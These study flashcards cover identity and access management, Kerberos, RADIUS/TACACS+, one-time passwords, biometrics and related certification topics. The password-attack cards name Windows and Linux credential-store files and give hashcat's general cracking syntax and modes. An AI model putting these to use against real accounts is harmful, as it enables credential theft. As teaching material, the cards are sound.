You might need to convert the certificate format to make it compatible with an application server, such as Java. The following command takes a PEM-encoded certificate and outputs a DER binary-encoded certificate:

openssl x509 -outform der -in www.pem -out www.der


Another use case is to export a key and certificate for use in Windows:

 

openssl pkcs12 -export -inkey www.key -in www.pem -out www.pfx

Term

CERTIFICATE ISSUES

Definition

§  If the problem is with an existing certificate that has been working previously, check that the certificate has not expired or been revoked or suspended. 

§  If the problem is with a new certificate, check that the key usage settings are appropriate for the application. Some clients, such as VPN and email clients, have very specific requirements for key usage configuration. Also, check that the subject name is correctly configured and that the client is using the correct address. For example, if a client tries to connect to a server by IP address instead of FQDN, a certificate configured with an FQDN will be rejected. 

§  If troubleshooting a new certificate that is correctly configured, check that clients have been configured with the appropriate chain of trust. You need to install root and intermediate CA certificates on the client before a leaf certificate can be trusted. Be aware that some client applications might maintain a different certificate store to that of the OS. 

§  In either case, verify that the time and date settings on the server and client are synchronized. Incorrect date/time settings are a common cause of certificate problems. 

 

From a security point of view, you must also audit certificate infrastructure to ensure that only valid certificates are being issued and trusted. Review logs of issued certificates periodically. Validate the permissions of users assigned to manage certificate services. Check clients to ensure that only valid root CA certificates are trusted. Make sure clients are checking for revoked or suspended certificates. 

Term
 identity and access management (IAM) 
Definition
Each network user and host device must be identified with an account so that you can control their access to your organization's applications, data, and services. The processes that support this requirement are referred to as identity and access management (IAM). Within IAM, authentication technologies ensure that only valid subjects (users or devices) can operate an account. Authentication requires the account holder to submit credentials that should only be known or held by them in order to access the account.
Term
Subjects  
Definition
Subjects in this sense are users, devices, or software processes, or anything else that can request and be granted access to a resource
Term
Objects 
Definition
. Objects are the resources; these could be networks, servers, databases, files, and so on.
Term
Identification 
Definition

creating an account or ID that uniquely represents the user, device, or process on the network.  

This phase involves associating a user (or computer) with a digital identity, or account.

 

The system owner verifies the user's identity and creates an account with a unique security identifier (SID). The account is configured with a credential known only to the user, such as a password or private key.

Term
Authentication 
Definition

proving that a subject is who or what it claims to be when it attempts to access the resource.

Authentication is required to allow the user to operate the account. The user enters the credential and it is converted to a secure form, such as a hash (not sent as plaintext). 

The system compares the submitted credential with the one held on file. If they match, the user is authenticated.

Term
Authorization
Definition

determining what rights subjects should have on each resource, and enforcing those rights. 

Resources available on the system are referred to as objects (the users are subjects). Each object is configured with an Access Control List (ACL). For each right or action that can be performed on the object, a given subject SID will either be allowed or denied.

 

Term
Accounting
Definition

tracking authorized usage of a resource or use of rights by a subject and alerting when unauthorized use is detected or attempted.  

Use of rights can be written to an audit log, providing non-repudiation. It is critical that the user not be able to tamper with the log.

 

Term
authentication, authorization, and accounting (AAA)
Definition

The servers and protocols that implement these functions are referred to as authentication, authorization, and accounting (AAA)). The use of IAM to describe enterprise processes and workflows is becoming more prevalent as the importance of the identification phase is better acknowledged.

 

Term


Something You Know Authentication

Definition
The typical knowledge factor is the logon, composed of a username and a password. The username is typically not a secret (although it should not be published openly), but the password must be known only to the account holder.A passphrase is a longer password composed of several words. This has the advantages of being more secure and easier to remember. A personal identification number (PIN) is also something you know,, although long PIN codes are hard to remember, and short codes are too vulnerable for most authentication systems. Swipe patterns are often used for authentication to touch-based devices.
Term

Something You Have Authentication 

Definition

An ownership factor means that the account holder possesses something that no one else does, such as a smart card, fob, or wristband programmed with a unique identity certificate or account number. Alternatively, they might have a USB fob that generates a unique code. These ownership factors can be described as hard tokens.

 

A device such as a smartphone can also be used to receive a uniquely generated access code as a soft token. Unlike a password, these tokens are valid for only one use, typically within a brief time window.

Term

Something You Are/Do Authentication 

Definition

biometric factor uses either physiological identifiers, such as a fingerprint, or behavioral identifiers, such as the way someone moves (gait). The identifiers are scanned and recorded as a template. When the user authenticates, another scan is taken and compared to the template.

Term
Authentication design 
refers to selecting a technology that meets requirements for confidentiality, integrity, and availability:
Definition

§  Confidentiality, in terms of authentication, is critical, because if account credentials are leaked, threat actors can impersonate the account holder and act on the system with whatever rights they have.

§  Integrity means that the authentication mechanism is reliable and not easy for threat actors to bypass or trick with counterfeit credentials.

 

§  Availability means that the time taken to authenticate does not impede workflows and is easy enough for users to operate.

Term
multifactor authentication (MFA).
Two-Factor Authentication (2FA) 
Definition

An authentication technology is considered strong if it combines the use of more than one type of knowledge, ownership, and biometric factor, and is called multifactor authentication (MFA).

Two-Factor Authentication (2FA) combines either an ownership-based smart card or biometric identifier with something you know, such as a password or PIN. Three-factor authentication combines all three technologies, or incorporates an additional attribute, such as location; for example, a smart card with integrated fingerprint reader. This means that to authenticate, the user must possess the card, the user's fingerprint must match the template stored on the card, and the user must input a PIN or password.

Term
authentication attribute  
Definition

is either a non-unique property or a factor that cannot be used independently.  

Term

Somewhere You Are Authentication 

Definition

Location-based authentication measures some statistic about where you are. This could be a geographic location, measured using a device's location service, or it could be by IP address. A device's IP address could be used to refer to a logical network segment, or it could be linked to a geographic location using a geolocation service. Within a premises network, the physical port location, virtual LAN (VLAN), or Wi-Fi network can also be made the basis of location-based authentication.

 

Location-based authentication is not used as a primary authentication factor, but it may be used as a continuous authentication mechanism or as an access control feature. For example, if a user enters the correct credentials at a VPN gateway but his or her IP address shows him/her to be in a different country than expected, access controls might be applied to restrict the privileges granted or refuse access completely. Another example is where a user appears to login from different geographic locations that travel time would make physically impossible.

Term

Something You Exhibit Authentication 

Definition

Something you exhibit also refers to behavioral-based authentication and authorization, with specific emphasis on personality traits. For example, the way you use smartphone apps or web search engines might conform to a pattern of behavior that can be captured by machine learning analysis as a statistical template. If someone else uses the device, their behavior will be different, and this anomalous pattern could be used to lock the device and require reauthentication.

Term

Someone You Know Authentication

Definition

A someone you know authentication scheme uses a web of trust model, where new users are vouched for by existing users. As the user participates in the network, their identity becomes better established. One example is the decentralized web of trust model, used by Pretty Good Privacy (PGP) as an alternative to PKI

Term
Windows local sign-in 
Definition

the Local Security Authority (LSA) compares the submitted credential to a hash stored in the Security Accounts Manager (SAM) database, which is part of the registry. This is also referred to as interactive logon.

Term
Windows network sign-in 
Definition

the LSA can pass the credentials for authentication to a network service. The preferred system for network authentication is based on Kerberos, but legacy network applications might use NT LAN Manager (NTLM) authentication.

Term
Remote sign-in 
Definition
if the user's device is not connected to the local network, authentication can take place over some type of virtual private network (VPN) or web portal.
Term
pluggable authentication module (PAM) 
Definition

pluggable authentication module (PAM) is a package for enabling different authentication providers, such as smart-card login

 

The PAM framework can also be used to implement authentication to network servers.

Term

Single Sign-On (SSO)

Definition

single sign-on (SSO) system allows the user to authenticate once to a local device and be authenticated to compatible application servers without having to enter credentials again. In Windows, SSO is provided by the Kerberos framework.

Term
Kerberos  
Definition

Kerberos is a single sign-on network authentication and authorization protocol used on many networks, notably as implemented by Microsoft's Active Directory (AD) service.

 It consists of three parts. Clients request services from application servers, which both rely on an intermediary—Key Distribution Center (KDC)—to vouch for their identity. There are two services that make up a KDC: the Authentication Service and the Ticket Granting Service. The KDC runs on port 88 using TCP or UDP.

Term

Kerberos Authentication Service. [image]

The password hash itself is not transmitted over the network. Also, although we refer to passwords for simplicity, the system can use other authentication providers, such as smart-card logon.

 

The Ticket Granting Ticket (TGT; or user ticket) is time-stamped (under Windows, they have a default maximum age of 10 hours). This means that workstations and servers on the network must be synchronized (to within five minutes) or a ticket will be rejected. This helps prevent replay attacks.

Definition

The Authentication Service is responsible for authenticating user logon requests. More generally, users and services can be authenticated; these are collectively referred to as principalsFor example, when you sit at a Windows domain workstation and log on to a realm (or domain), the first step of logon is to authenticate with a KDC server, implemented as a domain controller.

1.    The client sends the authentication service (AS) a request for a Ticket Granting Ticket (TGT). This is composed by encrypting the date and time on the local computer with the user's password hash as the key. 

2.            The AS checks that the user account is present, that it can decode the request by matching the user's password hash with the one in the Active Directory database, and that the request has not expired. If the request is valid, the AS responds with the following data:

·         Ticket Granting Ticket (TGT)—this contains information about the client (name and IP address) plus a timestamp and validity period. This is encrypted using the KDC's secret key.

·         Ticket Granting Service (TGS) session key for use in communications between the client and the TGS. This is encrypted using a hash of the user's password.

The TGT is an example of a logical token. All the TGT does is identify who you are and confirm that you have been authenticated—it does not provide you with access to any domain resources.

Term

KERBEROS AUTHORIZATION 

Presuming the user entered the correct password, the client can decrypt the Ticket Granting Service (TGS) session key but not the TGT. This establishes that the client and KDC know the same shared secret and that the client cannot interfere with the TGT.
[image]

Definition

1.    To access resources within the domain, the client requests a Service Ticket (a token that grants access to a target application server). This process of granting service tickets is handled by the TGS.

2.    The client sends the TGS a copy of its TGT and the name of the application server it wishes to access plus an authenticator, consisting of a time-stamped client ID encrypted using the TGS session key.

The TGS should be able to decrypt both messages using the KDC's secret key for the first and the TGS session key for the second. This confirms that the request is genuine. It also checks that the ticket has not expired and has not been used before (replay attack).

3.    The TGS service responds with:

·         Service session key—for use between the client and the application server. This is encrypted with the TGS session key.

·         Service ticket—containing information about the user, such as a timestamp, system IP address, Security Identifier (SID) and the SIDs of groups to which he or she belongs, and the service session key. This is encrypted using the application server's secret key.

4.            The client forwards the service ticket, which it cannot decrypt, to the application server and adds another time-stamped authenticator, which is encrypted using the service session key.

5.            The application server decrypts the service ticket to obtain the service session key using its secret key, confirming that the client has sent an untampered message. It then decrypts the authenticator using the service session key.

6.            Optionally, the application server responds to the client with the timestamp used in the authenticator, which is encrypted by using the service session key. The client decrypts the timestamp and verifies that it matches the value already sent, and concludes that the application server is trustworthy.

This means that the server is authenticated to the client (referred to as mutual authentication). This prevents a man-in-the-middle attack, where a malicious user could intercept communications between the client and server.

 

7.            The server now responds to client requests (assuming they conform to the server's access control list).

The data transfer itself is not encrypted (at least as part of Kerberos; some sort of transport encryption can be deployed).

 

One of the noted drawbacks of Kerberos is that the KDC represents a single point-of-failure for the network. In practice, backup KDC servers can be implemented (for example, Active Directory supports multiple domain controllers, each of which are running the KDC service).

Term
 
 
Definition
Term
Password Authentication Protocol (PAP)
Definition

The Password Authentication Protocol (PAP) is an unsophisticated authentication method developed as part of the Point-to-Point Protocol (PPP), used to transfer TCP/IP data over serial or dial-up connections. It is also used as the basic authentication mechanism in HTTP. It relies on clear text password exchange and is therefore obsolete for most purposes, except through an encrypted tunnel.

Term

Challenge Handshake Authentication Protocol (CHAP) 


The Challenge Handshake Authentication Protocol (CHAP) was also developed as part of PPP as a means of authenticating users over a remote link. CHAP relies on an encrypted challenge in a system called three-way handshake.

Definition
  1. Challenge—the server challenges the client, sending a randomly generated challenge message.

  2. Response—the client responds with a hash
    calculated from the server challenge message and client password (or other shared secret).

  3. Verification—the server performs its own hash using the password hash stored for the client. If it matches the response, then access is granted; otherwise, the connection is dropped.

The handshake is repeated with a different challenge message periodically during the connection (although transparent to the user). This guards against replay attacks, in which a previous session could be captured and reused to gain access.

 

MS-CHAPv2 is Microsoft's implementation of CHAP. Because of the way it uses vulnerable NTLM hashes, MS-CHAP should not be deployed without the protection of a secure connection tunnel so that the credentials being passed are encrypted. 

Term
Plaintext/Unencrypted Attacks 
Definition

plaintext/unencrypted attack exploits password storage or a network authentication protocol that does not use encryption. Examples include PAP, basic HTTP/FTP authentication, and Telnet. These protocols must not be used. Passwords must never be saved to an unmanaged file. One common source of credential breaches is passwords embedded in application code that has subsequently been uploaded to a public repository.

Term
Online Attacks 
Definition

An online password attack is where the threat actor interacts with the authentication service directly—a web login form or VPN gateway, for instance. The attacker submits passwords using either a database of known passwords (and variations) or a list of passwords that have been cracked offline

An online password attack can show up in audit logs as repeatedly failed logons and then a successful logon, or as successful logon attempts at unusual times or locations. Apart from ensuring the use of strong passwords by users, online password attacks can be mitigated by restricting the number or rate of logon attempts, and by shunning logon attempts from known bad IP addresses.

Term
Password spraying 
Definition

Password spraying is a horizontal brute-force online attack. This means that the attacker chooses one or more common passwords (for example, password or 123456) and tries them in conjunction with multiple usernames.

Term

offline attack 

Definition

 An offline attack means that the attacker has managed to obtain a database of password hashes, such as %SystemRoot%\System32\config\SAM, %SystemRoot%\NTDS\NTDS.DIT (the Active Directory credential store), or /etc/shadow. Once the password database has been obtained, the password cracker does not interact with the authentication system. The only indicator of this type of attack (other than misuse of the account in the event of a successful attack) is a file system audit log that records the malicious account accessing one of these files. Threat actors can also read credentials from host memory, in which case the only reliable indicator might be the presence of attack tools on a host.

If the attacker cannot obtain a database of passwords, a packet sniffer might be used to obtain the client response to a server challenge in a protocol such as NTLM or CHAP/MS-CHAP. Although these protocols avoid sending the hash of the password directly, the response is derived from it in some way. Password crackers can exploit weaknesses in a protocol to calculate the hash and match it to a dictionary word or brute force it.

 

Term

Brute-Force Attack

Definition

brute-force attack attempts every possible combination in the output space in order to match a captured hash and guess at the plaintext that generated it. The output space is determined by the number of bits used by the algorithm (128-bit MD5 or 256-bit SHA256, for instance). The larger the output space and the more characters that were used in the plaintext password, the more difficult it is to compute and test each possible hash to find a match. Brute-force attacks are heavily constrained by time and computing resources, and are therefore most effective at cracking short passwords. However, brute-force attacks distributed across multiple hardware components, like a cluster of high-end graphics cards, can be successful at cracking longer passwords.



Term
dictionary attack 
Definition

dictionary attack can be used where there is a good chance of guessing the likely value of the plaintext, such as a non-complex password. The software generates hash values from a dictionary of plaintexts to try to match one to a captured hash. 

Term
Rainbow table attacks
Definition
Rainbow table attacks refine the dictionary approach. The attacker uses a precomputed lookup table of all possible passwords and their matching hashes. Not all possible hash values are stored, as this would require too much memory. Values are computed in chains, and only the first and last values need to be stored. The hash value of a stored password can then be looked up in the table and the corresponding plaintext discovered.
Term
salt 
Definition

A salt is an additional value stored with the hashed data field. The purpose of salt is to frustrate attempts to crack the hashes. It means that the attacker cannot use pre-computed tables of hashes using dictionaries of plaintexts. These tables have to be recompiled to include the salt value.

Term
 hybrid password attack 
Definition
hybrid password attack uses a combination of attack methods when trying to crack a password. A typical hybrid password attack uses a combination of dictionary and brute force attacks. It is principally targeted against naïve passwords with inadequate complexity, such as james1.
Term
John the Ripper 
Definition

John the Ripper is an open source tool used for fast password cracking. Its primary focus is UNIX-based operating systems, but also Windows LanMan (LM) hashes.

Term
Hashcat
 [image]
Definition

Hashcat is a highly popular and powerful open-source password cracking tool used extensively in the field of cybersecurity and information security (InfoSec). It is designed to recover passwords from various cryptographic algorithms and hash types through brute-force, dictionary, and hybrid attacks

is run using the following general syntax:


hashcat -m HashType 
-a AttackMode -o OutputFile InputHashFile


The input file should contain hashes of the same type, using the specified format. 
Hashcat can be used with a single word list (dictionary mode -a 0) or multiple word lists (combinator mode -a 1). Mode -a 3 performs a brute-force attack, but this can be combined with a mask for each character position. This reduces the key space that must be searched and speeds up the attack. For example, you might learn or intuit that a company uses only letter characters in passwords. By omitting numeric and symbol characters, you can speed up the attack on each hash.

Term

Password key

Definition
USB tokens for connecting to PCs and smartphones. Some can use nearfield communications (NFC) or Bluetooth as well as physical connectivity
Term
Password vault
Definition

software-based password manager, typically using a cloud service to allow access from any device.

 

A USB key is also likely to use a vault for backup. Most operating systems and browsers implement native password vaults. Examples include Windows Credential Manager and Apple's iCloud Keychain 

Term
Smart-card authentication 
Definition
means programming cryptographic information onto a card equipped with a secure processing chip. The chip stores the user's digital certificate, the private key associated with the certificate, and a personal identification number (PIN) used to activate the card. 
Term

For Kerberos authentication, smart-card logon works as follows: 

Definition

1.    The user presents the smart card to a reader and is prompted to enter a PIN.

2.    Inputting the correct PIN authorizes the smart card's cryptoprocessor to use its private key to create a Ticket Granting Ticket (TGT) request, which is transmitted to the authentication server (AS). 

3.    The AS is able to decrypt the request because it has a matching public key and trusts the user's certificate, either because it was issued by a local certification authority or by a third-party CA that is a trusted root CA.

 

4.    The AS responds with the TGT and Ticket Granting Service (TGS) session key.

Term

Various technologies can be used to avoid the need for an administrator to generate a private key and transmit it to the user:

Definition

§  Smart card—some cards are powerful enough to generate key material using the cryptoprocessor embedded in the card.

§  USB key—a cryptoprocessor can also be implemented in the USB form factor.

Trusted Platform Module (TPM)—a secure cryptoprocessor enclave implemented on a PC, laptop, smartphone, or network appliance. The TPM is usually a module within the CPU. Modification of TPM data is only permitted by highly trusted processes. A TPM can be used to present a virtual smart card 

Term
hardware security module (HSM) 
Definition

Smart cards, USB keys, and virtual smart cards are provisioned as individual devices. Often keys need to be provisioned to non-user devices too, such as servers and network appliances. hardware security module (HSM) is a network appliance designed to perform centralized PKI management for a network of devices. This means that it can act as an archive or escrow for keys in case of loss or damage. Compared to using a general-purpose server for certificate services, HSMs are optimized for the role and so have a smaller attack surface. HSMs are designed to be both tamper-resistant to prevent unauthorized access and tamper-evident to clearly show any signs of attempted intrusion, thereby mitigating the risk of insider threats. They can also provide enterprise-strength cryptographically secure pseudorandom number generators (CSPRNGs). HSMs can be implemented in several form factors, including rack-mounted appliances, plug-in PCIe adapter cards, and USB-connected external peripherals.

Term
Authentication may also be required in other contexts
Definition

§  When the user is accessing a wireless network and needs to authenticate with the network database.

§  When a device is connecting to a network via a switch and network policies require the user to be authenticated before the device is allowed to communicate.

 

§  When the user is connecting to the network over a public network via a virtual private network (VPN).

Term
IEEE 802.1X Port-based Network Access Control (NAC)standard provides the means of using an EAP method when a device connects to an Ethernet switch port, wireless access point (with enterprise authentication configured), or VPN gateway. 802.1X uses authentication, authorization, and accounting (AAA) architecture
Definition

§  Supplicant—the device requesting access, such as a user's PC or laptop.

§  Network access server (NAS)—edge network appliances, such as switches, access points, and VPN gateways. These are also referred to as RADIUS clients or authenticators.

 

§  AAA server—the authentication server, positioned within the local network.

With AAA, the NAS devices do not have to store any authentication credentials. They forward this data between the AAA server and the supplicant. There are two main types of AAA server: RADIUS and TACACS+.

Term
REMOTE AUTHENTICATION DIAL-IN USER SERVICE 
Definition

The Remote Authentication Dial-in User Service (RADIUS) standard is published as an Internet standard. There are several RADIUS server and client products. 

The Network Access Server (NAS)/Network Access Point (NAP) device (RADIUS client) is configured with the IP address of the RADIUS server and with a shared secret. This allows the client to authenticate to the server. Remember that the client is the access device (switch, access point, or VPN gateway), not the user's PC or laptop. A generic RADIUS authentication workflow process is as follows: 

Term
EAP over LAN (EAPoL)  
Definition

A port-based network access control (PNAC) mechanism that allows the use of EAP authentication when a host connects to an Ethernet switch.

 

Term

REMOTE AUTHENTICATION DIAL-IN USER SERVICE

Definition
The Network Access Server (NAS)/Network Access Point (NAP) device (RADIUS client) is configured with the IP address of the RADIUS server and with a shared secret. This allows the client to authenticate to the server. Remember that the client is the access device (switch, access point, or VPN gateway), not the user's PC or laptop
Term

REMOTE AUTHENTICATION DIAL-IN USER SERVICE

A generic RADIUS authentication workflow process is as follows:

Definition

The user's device (the supplicant) makes a connection to the NAS appliance, such as an access point, switch, or remote access server

2.            The NAS prompts the user for their authentication credentials. RADIUS supports PAP, CHAP, and EAP. Most implementations now use EAP, as PAP and CHAP are not secure. If EAP credentials are required, the NAS enables the supplicant to transmit EAP over LAN (EAPoL) data, but does not allow any other type of network traffic.

3.            The supplicant submits the credentials as EAPoL data. The RADIUS client uses this information to create an Access-Request RADIUS packet, encrypted using the shared secret. It sends the Access-Request to the AAA server using UDP on port 1812 (by default).

4.            The AAA server decrypts the Access-Request using the shared secret. If the Access-Request cannot be decrypted (because the shared secret is not correctly configured, for instance), the server does not respond.

5.            With EAP, there will be an exchange of Access-Challenge and Access-Request packets as the authentication method is set up and the credentials verified. The NAS acts as a pass-thru, taking RADIUS messages from the server, and encapsulating them as EAPoL to transmit to the supplicant.

6.            At the end of this exchange, if the supplicant is authenticated, the AAA server responds with an Access-Accept packet; otherwise, an Access-Reject packet is returned.

 

Optionally, the NAS can use RADIUS for accounting (logging). Accounting uses port 1813. The accounting server can be different from the authentication server.

Term

TERMINAL ACCESS CONTROLLER ACCESS-CONTROL SYSTEM
(TACACS+) 
  TACACS+ uses TCP communications (over port 49),

Definition

AAA services are also used for the purpose of centralizing logins for the administrative accounts for network appliances. This allows network administrators to be allocated specific privileges on each switch, router, access point, and firewall. 

§  TACACS+ uses TCP communications (over port 49), and this reliable, connection-oriented delivery makes it easier to detect when a server is down.

§  All the data in TACACS+ packets is encrypted (except for the header identifying the packet as TACACS+ data), rather than just the authentication data. This ensures confidentiality and integrity when transferring critical network infrastructure data.

 

§  Authentication, authorization, and accounting functions are discrete. Many device management tasks require reauthentication (similar to having to re-enter a password for sudo or UAC) and per-command authorizations and privileges for users, groups, and roles. TACACS+ supports this workflow better than RADIUS.

Term
Terminal Access Controller Access-Control System Plus (TACACS+) 
Definition

An AAA protocol developed by Cisco that is often used to authenticate to administrator accounts for network appliance management. 

 

Term
one-time password (OTP) 
Definition

one-time password (OTP) is one that is generated automatically, rather than being chosen by a user, and used only once. Consequently, it is not vulnerable to password guessing or sniffing attacks. An OTP is generated using some sort of hash function on a secret value plus a synchronization value (seed), such as a timestamp or counter.

Term
static token  
Definition

There are also simpler token keys and smart cards that simply transmit a static token programmed into the device. For example, many building entry systems work on the basis of static codes. These mechanisms are highly vulnerable to cloning and replay attacks.

Term
Fast Identity Online (FIDO) Universal Second Factor (U2F) USB token 
Definition

There are many other ways of implementing hardware token keys. For example, a Fast Identity Online (FIDO) Universal Second Factor (U2F) USB token registers a public key with the authentication service. The authentication mechanism then requires the private key locked to the token, which is authorized using PIN or fingerprint activation

 

This can also be used with the Windows Hello authentication provider 

Term
HMAC-Based One-Time Password Algorithm (HOTP) 
Definition

HMAC-based One-time Password Algorithm (HOTP) is an algorithm for token-based authentication

). The authentication server and client token are configured with the same shared secret. This should be an 8-byte value generated by a cryptographically strong random number generator. The token could be a fob-type device or implemented as a smartphone authentication/authenticator app.

 

The shared secret can be transmitted to the smartphone app as a QR code image acquirable by the phone's camera so that the user doesn't have to type anything. Obviously, it is important that no other device is able to acquire the shared secret. The shared secret is combined with a counter to create a one-time password when the user wants to authenticate. The device and server both compute the hash and derive an HOTP value that is 6-8 digits long. This is the value that the user must enter to authenticate with the server. The counter is incremented by one.

Term

HMAC-Based One-Time Password Algorithm (HOTP)

Definition

An algorithm that generates a one-time password using a hash-based authentication code to verify the authenticity of the message.

 

Term

Time-Based One-Time Password Algorithm (TOTP)

Definition

An improvement on HOTP that forces one-time passwords to expire after a short period of time.

The Time-based One-time Password Algorithm (TOTP) is a refinement of the HOTP . One issue with HOTP is that tokens can be allowed to persist unexpired, raising the risk that an attacker might be able to obtain one and decrypt data in the future. In TOTP, the HMAC is built from the shared secret plus a value derived from the device's and server's local timestamps. TOTP automatically expires each token after a short window (60 seconds, for instance). For this to work, the client device and server must be closely time-synchronized. One well-known implementation of HOTP and TOTP is Google Authenticator.

 

Term

2-STEP VERIFICATION

2-step verification or out-of-band mechanisms generate a software token on a server and send it to a resource assumed to be safely controlled by the user. The token can be transmitted to the device in a number of ways:

Definition

§  Short Message Service (SMS)—the code is sent as a text to the registered phone number.

§  Phone call—the code is delivered as an automated voice call to the registered phone number.

§  Push notification—the code is sent to a registered authenticator app on the PC or smartphone.

 

§  Email—the code is sent to a registered email account.

Term

BIOMETRIC AUTHENTICATION 

Definition

The first step in setting up biometric authentication is enrollment. The chosen biometric information is scanned by a biometric reader and converted to binary information. There are generally two steps in the scanning process:

1.    A sensor module acquires the biometric sample from the target.

2.    A feature extraction module records the features in the sample that uniquely identify the target.

The biometric template is kept in the authentication server's database. When the user wants to access a resource, he or she is re-scanned, and the scan is compared to the template. If they match to within a defined degree of tolerance, access is granted.

Several pattern types can be used to identify people biometrically. These can be categorized as physical (fingerprint, eye, and facial recognition) or behavioral (voice, signature, and typing pattern matching).

Term

FINGERPRINT RECOGNITION 

Physiologic biometric features represent a "something you are" factor. They include fingerprint patterns, iris or retina recognition, or facial recognition.

Definition

Fingerprint recognition is the most widely implemented biometric authentication method. The technology required for scanning and recording fingerprints is relatively inexpensive and the process quite straightforward. A fingerprint sensor is usually implemented as a small capacitive cell that can detect the unique pattern of ridges making up the pattern. The technology is also non-intrusive and relatively simple to use, although moisture or dirt can prevent readings.

The main problem with fingerprint scanners is that it is possible to obtain a copy of a user's fingerprint and create a mold of it that will fool the scanner

 

These concerns are addressed by vein matching scanners, or vascular biometrics. This requires a more complex scanner—an infrared light source and camera—to create a template from the unique pattern of blood vessels in a person's finger or palm.

Term
FACIAL RECOGNITION
Definition

Facial recognition records multiple indicators about the size and shape of the face, like the distance between each eye, or the width and length of the nose. The initial pattern must be recorded under optimum lighting conditions; depending on the technology, this can be a lengthy process. Again, this technology is very much associated with law enforcement, and is the most likely to make users uncomfortable about the personal privacy issues. Facial recognition suffers from relatively high false acceptance and rejection rates and can be vulnerable to spoofing. Much of the technology development is in surveillance, rather than for authentication, although it is becoming a popular method for use with smartphones.

§  Retinal scanan infrared light is shone into the eye to identify the pattern of blood vessels. The arrangement of these blood vessels is highly complex and typically does not change from birth to death, except in the event of certain diseases or injuries. Retinal scanning is therefore one of the most accurate forms of biometrics. Retinal patterns are very secure, but the equipment required is expensive and the process is relatively intrusive and complex. False negatives can be produced by disease, such as cataracts.

 

§  Iris scanmatches patterns on the surface of the eye using near-infrared imaging and so is less intrusive than retinal scanning (the subject can continue to wear glasses, for instance) and a lot quicker. Iris scanners offer a similar level of accuracy as retinal scanners but are much less likely to be affected by diseases. Iris scanning is the technology most likely to be rolled out for high-volume applications, such as airport security. There is a chance that an iris scanner could be fooled by a high-resolution photo of someone's eye.

Term
BEHAVIORAL TECHNOLOGIES 
Definition

BEHAVIORAL TECHNOLOGIES

"Something you do" refers to behavioral biometric pattern recognition. Rather than scan some attribute of your body, a template is created by analyzing a behavior, such as typing, writing a signature, or walking/moving. The variations in motion, pressure, or gait are supposed to uniquely verify each individual. In practice, however, these methods are subject to higher error rates, and are much more troublesome for a subject to perform.

  • Voice recognition—relatively cheap, as the hardware and software required are built into many standard PCs and mobiles. However, obtaining an accurate template can be difficult and time-consuming. Background noise and other environmental factors can also interfere with logon. Voice is also subject to impersonation.
  • Gait analysis—produces a template from human movement (locomotion). The technologies can either be camera-based or use smartphone features, such as an accelerometer and gyroscope.
  • Signature recognition—signatures are relatively easy to duplicate, but it is more difficult to fake the actual signing process. Signature matching records the user applying their signature (stroke, speed, and pressure of the stylus).
  • Typing—matches the speed and pattern of a user’s input of a passphrase.

Some biometric and behavioral technologies might be used for purposes other than logon authentication:

  • Biometric identification refers to matching people to a database, as opposed to authenticating them per se. For example, if an individual crossing the floor of the data center does not produce a match for gait analysis, the system may raise a security alert (https://www.g4s.com/news-and-insights/insights/2017/12/06/keeping-data-centres-secure).
  • Continuous authentication verifies that the user who logged on is still operating the device. For example, if a user successfully authenticates to a smartphone using a fingerprint, the device continues to monitor key motion and pressure statistics as the device is held and manipulated. If this deviates from the baseline, detection system would lock the phone. This sort of technology is not available on the market (at the time of writing), but it is the subject of numerous research projects.
Term
Gait analysis 
Definition

§  Gait analysis—produces a template from human movement (locomotion). The technologies can either be camera-based or use smartphone features, such as an accelerometer and gyroscope.

Term

Certificates and Smart Cards 

Definition

 

Public key infrastructure (PKI) allows the management of digital identities, where a certificate authority (CA) issues certificates to validated subjects (users and servers). The subject identity can be trusted by any third party that also trusts the CA.

 

The certificate contains the subject's public key and is signed by the CA's private key. These public keys allow third parties to verify the certificate and the signature. The subject's public key is part of a pair with a linked private key. The private key must be kept secret. It can be stored on the computer, either in the file system or in a trusted platform module (TPM) chip. Alternatively, a user's certificate and private key can be stored on a smart card or USB key and used to authenticate to different PCs and mobile devices.

Term

Tokens

Definition

It is inconvenient for users to authenticate to each application they need to use. In a single sign-on system, the user authenticates to an identity provider (IdP) and receives a cryptographic token. The user can present that token to compatible applications as proof they are authenticated, and receive authorizations from the application. With a token, there is always a risk that a malicious actor will be able to capture and replay it. The application protocol that makes use of tokens must be designed to resist this type of attack.

Term

Identity Providers

Definition

The identity provider is the service that provisions the user account and processes authentication requests. On a private network, these identity directories and application authorization services can be operated locally. The same site operates both identity provision and application provision. Most networks now make use of third-party cloud services, however. In this scenario, various protocols and frameworks are available to implement federated identity management across web-based services. This means that a user can create a digital identity with one provider, but other sites can use that identity to authorize use of an application.

Term

Background Check

Definition

A background check determines that a person is who they say they are and are not concealing criminal activity, bankruptcy, or connections that would make them unsuitable or risky. Employees working in high confidentiality environments or with access to high value transactions will obviously need to be subjected to a greater degree of scrutiny. For some jobs, especially federal jobs requiring a security clearance, background checks are mandatory. Some background checks are performed internally, whereas others are done by an external third party. 

Term

Onboarding 

Definition

Onboarding at the HR level is the process of welcoming a new employee to the organization. The same sort of principle applies to taking on new suppliers or contractors. Some of the same checks and processes are used in creating customer and guest accounts. As part of onboarding, the IT and HR function will combine to create an account for the user to access the computer system, assign the appropriate privileges, and ensure the account credentials are known only to the valid user. These functions must be integrated, to avoid creating accidental configuration vulnerabilities, such as IT creating an account for an employee who is never actually hired. Some of the other tasks and processes involved in onboarding include:

§  Secure transmission of credentialscreating and sending an initial password or issuing a smart card securely. The process needs protection against rogue administrative staff. Newly created accounts with simple or default passwords are an easily exploitable backdoor.

§  Asset allocationprovision computers or mobile devices for the user or agree to the use of bring-your-own-device handsets.

 

§  Training/policiesschedule appropriate security awareness and role-relevant training and certification. 

Term

Nondisclosure Agreement (NDA) 

Definition

The terms of a nondisclosure agreement (NDA) might be incorporated within the employee contract or could be a separate document. When an employee or contractor signs an NDA, they are asserting that they will not share confidential information with a third party. 

Term
Separation of duties 
Definition

Separation of duties is a means of establishing checks and balances against the possibility that critical systems or procedures can be compromised by insider threats. Duties and responsibilities should be divided among individuals to prevent ethical conflicts or abuse of powers. 


An employee is supposed to work for the interests of their organization exclusively. A situation where someone can act in his or her own interest, personally, or in the interests of a third party is said to be a conflict of interest.

Separation of duties means that employees must be constrained by security policies:

§  Standard operating procedures (SOPs) mean that an employee has no excuse for not following protocol in terms of performing these types of critical operations.

§  Shared authority means that no one user is able to take action or enable changes on his or her own authority. At least two people must authorize the change. One example is separating responsibility for purchasing (ordering) from that of authorizing payment. Another is that a request to create an account should be subject to approval and oversight.

 

Separation of duties does not completely eliminate risk because there is still the chance of collusion between two or more people. This, however, is a much less likely occurrence than a single rogue employee.

Term

